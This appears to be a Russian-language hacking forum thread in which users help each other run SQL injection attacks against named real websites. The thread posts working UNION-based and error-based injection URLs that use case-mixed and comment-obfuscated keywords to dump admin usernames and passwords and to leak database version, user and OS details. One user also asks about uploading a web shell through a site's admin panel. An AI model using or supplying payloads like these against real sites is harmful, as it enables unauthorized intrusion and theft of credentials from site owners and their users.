Ваши вопросы по уязвимостям.

Konqi, можешь помочь?

 

в чем помочь? я же сказал нельзя писать имя таблицы в таком виде, пиши так как есть

 

Konqi,
Я сделал так первым делом:

Code:

http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT(name,0x3a,password),3,4,5,6,7+from+admin--

то же самое... не работает

 

http://www.maxxhits.com/index.php?phr=Shopping&cid=14&id=-5+/*!UnIoN+SeLeCt*/+1,group_cOnCaT(name,0x3a,password),3,4,5,6,7+from+swizzel_maxxhitsads.admin--

 

Konqi, там же просто админ был... почему swizzel_maxxhitsads.admin?

 

таблица находится в другой базе

 

Konqi, выводишь базы через SELECT schema_name или SELECT distinct() ?

 

table_schema

 

i use order by 1 and no error and page load normally

but

http://www.webmeter.ws/webstats.php?user=291035+union+select+1--

The used SELECT statements have a different number of columns

 

http://www.webmeter.ws/webstats.php?user=291035+or+(1,1)=(select+count(0),concat((select+concat_ws(concat(char(32),char(58),char(32)),user(),version(),database(),@@version_compile_os)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

 

поправте линк плыз
http://bgia.bard.edu/index.php?id=-30+or+(1,1)=(SeLeCt+/*count*/(0),CoNCat((SeLeCt+version()+/*from*/+information_schema.%60tables%60+limit+0,1),/*floor*/(RaNd(0)*2))/*from*/(information_schema.%60tables%60+group+by+6)--+

 

Подскажите вот через эту админку



Можно залить шелл?

 

можно >>>>>>

 

http://materinstvo.ru/art/683'

Реально ли раскрутить такую скулю? парился-парился нифига не вышло...

 

и с чего ты решил что там должна быть скуль?

 

удали фф =\
через оперу подставь кавычку и увидишь

 

опа, просто к фф привык )

 

Нет у меня в админке таких настроек.
Если не сложно стукни в асю мне..

 

Угу) в фф показывать не хочет) вот сижу и парюсь, пока безрезультатно)

 

А как это так, что в лисе не показывает?
И че, так вот под ФФ и проходят скули мимо?